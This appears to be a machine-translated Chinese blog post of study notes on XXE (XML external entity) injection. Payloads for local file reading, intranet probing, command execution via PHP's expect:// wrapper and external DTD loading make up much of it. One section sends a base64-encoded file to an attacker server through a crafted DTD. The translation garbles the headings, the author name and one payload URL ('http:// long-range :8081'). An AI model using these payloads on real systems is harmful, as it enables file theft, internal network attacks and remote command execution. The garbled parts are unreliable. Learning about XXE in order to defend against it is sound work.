当前位置：网站首页>XxE & XML vulnerability

XxE & XML vulnerability

2022-07-27 08:11:00 【weixin_ fifty-three million one hundred and fifty thousand four】

List of articles

Weekly learning summary link
One 、XXE Loophole
Two 、XML Learning from
3、 ... and 、DTD
Four 、 Attack ideas
summary

Weekly learning summary link

I remember there was a level before that was this loophole , But I forgot

One 、XXE Loophole

XXE Full name of loophole XML External Entity Injection namely xml External entity injection vulnerability ,XXE The vulnerability is in application parsing XML When the input , Loading of external entities is not prohibited , Causes a malicious external file to load , Cause file read 、 Command execution 、 Intranet port scan 、 Attack intranet sites 、 launch dos Attack, etc .xxe Vulnerability trigger point is often upload xml The location of the file , No upload of xml File filtering , Result in uploadable malicious xml file .

In practice, we may not know how to find this vulnerability , In fact, it's very simple. Just grab a packet and see if the data style is XML Grammar is fine

Two 、XML Learning from

There is really nothing to say about this , If you can't do this , I doubt your ability

3、 ... and 、DTD

When I studied development before , I haven't seen , Advice to see ,
The article links

Four 、 Attack ideas

Reading documents

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///d://test.txt"> ]>
<x>&xxe;</x>

Intranet probe or attack intranet application （ Trigger vulnerability address ）

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" > ]>
<x>&rabbit;</x>

RCE The CASE It's installing expect Extended PHP Executing system commands in the environment

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "expect://id" > ]>
<x>&xxe;</x>

Introducing external entities dtd

<?xml version="1.0" ?>
<!DOCTYPE test [ <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd"> %file; ]>
<x>&send;</x>

evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">

No echo – Read the file

<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt"> <!ENTITY % dtd SYSTEM "http:// long-range :8081/test.dtd"> %dtd; %send; ]>

Create corresponding files on your own server , Make the target server access its own server , View information from logs
test.dtd：
```
<!ENTITY % payload
 "<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;
```

agreement - Reading documents （ Bypass ）

<?xml version = "1.0"?>
    <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>

summary

Reference article

原网站

版权声明
本文为[weixin_ fifty-three million one hundred and fifty thousand four]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/208/202207270502412957.html